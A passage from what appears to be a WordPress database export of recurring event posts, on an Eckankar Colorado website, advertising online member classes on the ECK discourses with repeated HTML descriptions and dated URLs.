18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-06#038;p=262907',0,'tribe_events','',0),(262915,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-07-04','','','2020-12-09 11:37:55','2020-12-09 18:37:55','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-04#038;p=262907',0,'tribe_events','',0),(262916,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-08-01','','','2020-12-09 11:37:56','2020-12-09 18:37:56','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-01#038;p=262907',0,'tribe_events','',0),(262917,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-09-05','','','2020-12-09 11:37:56','2020-12-09 18:37:56','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-05#038;p=262907',0,'tribe_events','',0),(262918,2,'2020-12-09 11:22:48','2020-12-09 18:22:48','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 4 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 4 Discourses','','publish','closed','closed','','online-member-class-the-master-4-discourses-2021-10-03','','','2020-12-09 11:37:56','2020-12-09 18:37:56','',262907,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-03#038;p=262907',0,'tribe_events','',0),(262919,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way','','','2020-12-09 20:22:33','2020-12-10 03:22:33','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262919',0,'tribe_events','',0),(262953,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-01-10','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-10#038;p=262919',0,'tribe_events','',0),(262954,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-02-14','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-14#038;p=262919',0,'tribe_events','',0),(262955,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-03-14','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-14#038;p=262919',0,'tribe_events','',0),(262956,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-04-11','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-11#038;p=262919',0,'tribe_events','',0),(262957,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-05-09','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-09#038;p=262919',0,'tribe_events','',0),(262958,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-06-13','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-13#038;p=262919',0,'tribe_events','',0),(262959,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-07-11','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-11#038;p=262919',0,'tribe_events','',0),(262960,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-08-08','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-08#038;p=262919',0,'tribe_events','',0),(262961,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-09-12','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-12#038;p=262919',0,'tribe_events','',0),(262962,2,'2020-12-09 11:28:32','2020-12-09 18:28:32','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Easy Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Easy Way','','publish','closed','closed','','online-member-class-the-easy-way-2021-10-10','','','2020-12-09 11:28:32','2020-12-09 18:28:32','',262919,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-10#038;p=262919',0,'tribe_events','',0),(262963,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-01-17','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-17#038;p=262905',0,'tribe_events','',0),(262964,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-02-21','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-21#038;p=262905',0,'tribe_events','',0),(262965,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-03-21','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-21#038;p=262905',0,'tribe_events','',0),(262966,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-04-18','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-18#038;p=262905',0,'tribe_events','',0),(262967,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-05-16','','','2020-12-09 11:20:09','2020-12-09 18:20:09','',262905,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-16#038;p=262905',0,'tribe_events','',0),(262968,2,'2020-12-09 11:20:09','2020-12-09 18:20:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Master 2 Discourses\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class – The Master 2 Discourses','','publish','closed','closed','','online-member-class-the-master-2-discourses-2-2021-06-20','','','2020-12-09 